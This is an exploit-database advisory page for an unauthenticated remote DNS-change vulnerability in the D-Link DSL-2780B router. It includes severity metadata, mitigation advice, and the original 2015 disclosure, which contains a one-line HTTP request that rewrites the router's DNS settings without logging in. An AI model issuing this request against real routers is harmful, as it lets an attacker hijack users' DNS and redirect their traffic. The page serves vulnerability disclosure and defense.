header-logo
Suggest Exploit
vendor:
DSL-2780B
by:
Todor Donev
8.8
CVSS
HIGH
Unauthenticated Remote DNS Change
284
CWE
Product Name: DSL-2780B
Affected Version From: 01.01.14
Affected Version To: 01.01.14
Patch Exists: YES
Related CWE: N/A
CPE: h:d-link:dsl-2780b
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2015

D-Link DSL-2780B DLink_1.01.14 Unauthenticated Remote DNS Change

This vulnerability allows an unauthenticated attacker to remotely change the DNS settings of the D-Link DSL-2780B DLink_1.01.14 router. By sending a specially crafted HTTP request to the router, an attacker can change the DNS settings of the router to any DNS server of their choice.

Mitigation:

Users should ensure that their router is running the latest version of the firmware and that they have enabled authentication for the router's web interface.
Source

Exploit-DB raw data:

  D-Link DSL-2780B DLink_1.01.14 
  Unauthenticated Remote DNS Change

  Copyright 2015 (c) Todor Donev 
  <todor.donev at gmail.com>
  http://www.ethical-hacker.org/
  https://www.facebook.com/ethicalhackerorg

  No description for morons, 
  script kiddies & noobs !!

  Disclaimer:
  This or previous programs is for Educational
  purpose ONLY. Do not use it without permission.
  The usual disclaimer applies, especially the
  fact that Todor Donev is not liable for any
  damages caused by direct or indirect use of the
  information or functionality provided by these
  programs. The author or any Internet provider
  bears NO responsibility for content or misuse
  of these programs or any derivatives thereof.
  By using these programs you accept the fact
  that any damage (dataloss, system crash,
  system compromise, etc.) caused by the use
  of these programs is not Todor Donev's
  responsibility.
  
  Use them at your own risk!


[todor@adamantium ~]$ GET "http://TARGET/dnscfg.cgi?dnsSecondary=8.8.4.4&dnsIfcsList=&dnsRefresh=1" 0&> /dev/null <&1

Navigation

Suggest Exploit

Services By CQR